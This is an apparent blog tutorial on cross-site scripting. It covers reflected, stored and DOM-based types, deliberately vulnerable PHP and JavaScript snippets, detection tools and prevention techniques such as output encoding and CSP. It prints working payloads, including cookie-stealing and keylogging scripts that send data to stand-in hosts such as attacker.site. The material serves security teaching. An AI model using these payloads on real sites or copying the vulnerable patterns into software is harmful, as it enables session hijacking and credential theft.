Home Cross-site Complete Cross-site Scripting Walkthrough

Complete Cross-site Scripting Walkthrough

Sunday, July 20, 2025 Add Comment Edit

 🛡️ Complete Cross-Site Scripting (XSS) Walkthrough


From Basics to Exploitation & Defense

🧠 What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject malicious JavaScript into trusted websites or applications. The script then runs in the victim’s browser in the context of that site.

🔥 Why It’s Dangerous:

  • Session hijacking

  • Credential theft

  • Defacing sites

  • Phishing through trusted domains

  • Full control via browser-based malware

🧱 Types of XSS Attacks

TypeDescriptionExample Impact
Reflected XSSScript comes from user input and is reflected in the response immediatelyPhishing links, stealing cookies
Stored XSSScript is permanently stored on the server (DB, logs, comments, etc.)Defacement, mass infections
DOM-based XSSScript is executed due to vulnerable JavaScript on the client-sideComplex; bypasses backend sanitization

🔬 Reflected XSS Example

✅ Vulnerable code (PHP):

php

<?php
  $name = $_GET['name'];
  echo "Hello, $name";
?>

🔥 Attack:

html

https://vulnerable.site/page.php?name=<script>alert('XSS')</script>

🧪 Stored XSS Example

Scenario:

  • Comment box allows HTML input without sanitization

Input:

html

<script>fetch('http://attacker.site/cookie?c=' + document.cookie)</script>

Result:

  • Anyone viewing the comment will trigger the JavaScript

🧬 DOM-Based XSS Example

Vulnerable JS:

javascript

let name = location.hash.substring(1); // e.g. #<script>alert(1)</script>
document.getElementById("output").innerHTML = name;

Fix:

Never assign raw input to innerHTML. Use textContent.

🛠️ Common Payloads

GoalPayload Example
Alert box<script>alert(1)</script>
Cookie theft<script>fetch('https://x.com?c='+document.cookie)</script>
Keylogger<script>document.onkeypress = e => fetch('x?'+e.key)</script>
Iframe injection<iframe src="http://evil.com"></iframe>
Event handler<img src=x onerror=alert(1)>
Inline JS execution<svg onload=alert(1)>

🧰 Tools for Finding and Testing XSS

ToolPurpose
Burp SuiteManual testing & fuzzing
XSStrikeAutomated XSS scanner
XSS HunterFind blind XSS
DalFoxAdvanced automated scanner
Google DorksFind public vulnerable endpoints

🚩 How to Detect XSS Vulnerabilities

  1. Look for unsanitized user input reflected in HTML

  2. Use automated scanners (Burp, DalFox, OWASP ZAP)

  3. Try common payloads in inputs (form fields, URLs, headers)

  4. Inspect DOM with dev tools for dynamic rendering flaws

🧱 Real-World XSS Examples

  • Twitter (2014) – tweet-based payload auto-executed in timelines

  • eBay – vulnerable item listings led to persistent XSS

  • Yahoo! Mail – attackers read mail using stored XSS

  • Tesla – multiple reports of XSS in dashboard parameters

🔐 How to Prevent XSS

TechniqueDescription
Input sanitizationRemove or encode suspicious characters (<, >, " etc)
Output encodingUse htmlspecialchars() in PHP / escape in JS templates
CSP (Content Security Policy)Prevents inline JS execution
HttpOnly cookiesBlocks access to document.cookie from JS
Use secure frameworksReact, Angular auto-sanitize most outputs
Avoid innerHTMLUse textContent or innerText

📜 Content Security Policy Example

http

Content-Security-Policy: default-src 'self'; script-src 'self'

This prevents external script execution and inline JS.

XSS Walkthrough Summary

StepWhat You Do
Identify inputsLook for query params, forms, headers
Inject payloadsUse common test payloads in fields
Analyze behaviorInspect response, check for script execution
ExploitIf reflected/stored/DOM-based, try real attacks
MitigateSanitize input/output, apply CSP, use frameworks

📘 Want a Downloadable PDF Cheat Sheet?

Let me know — I’ll generate a 1–page printable PDF with:

  • Payload categories

  • Testing tools

  • Output encoding tips

  • CSP template

  • Vulnerability checklist

🧠 Bonus: XSS Labs to Practice On

PlatformLink
PortSwigger XSS Labhttps://portswigger.net/web-security/cross-site-scripting
HackTheBox / TryHackMeSearch for “XSS” rooms
OWASP Juice Shophttps://owasp.org/www-project-juice-shop/
XSS Game by Googlehttps://xss-game.appspot.com

📈 SEO Tags / Keywords

  • cross site scripting tutorial

  • xss payload examples

  • stored vs reflected xss

  • how to prevent xss in javascript

  • xss in dom walkthrough

  • xss for bug bounty

Download

0 Response to "Complete Cross-site Scripting Walkthrough"

Post a Comment

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel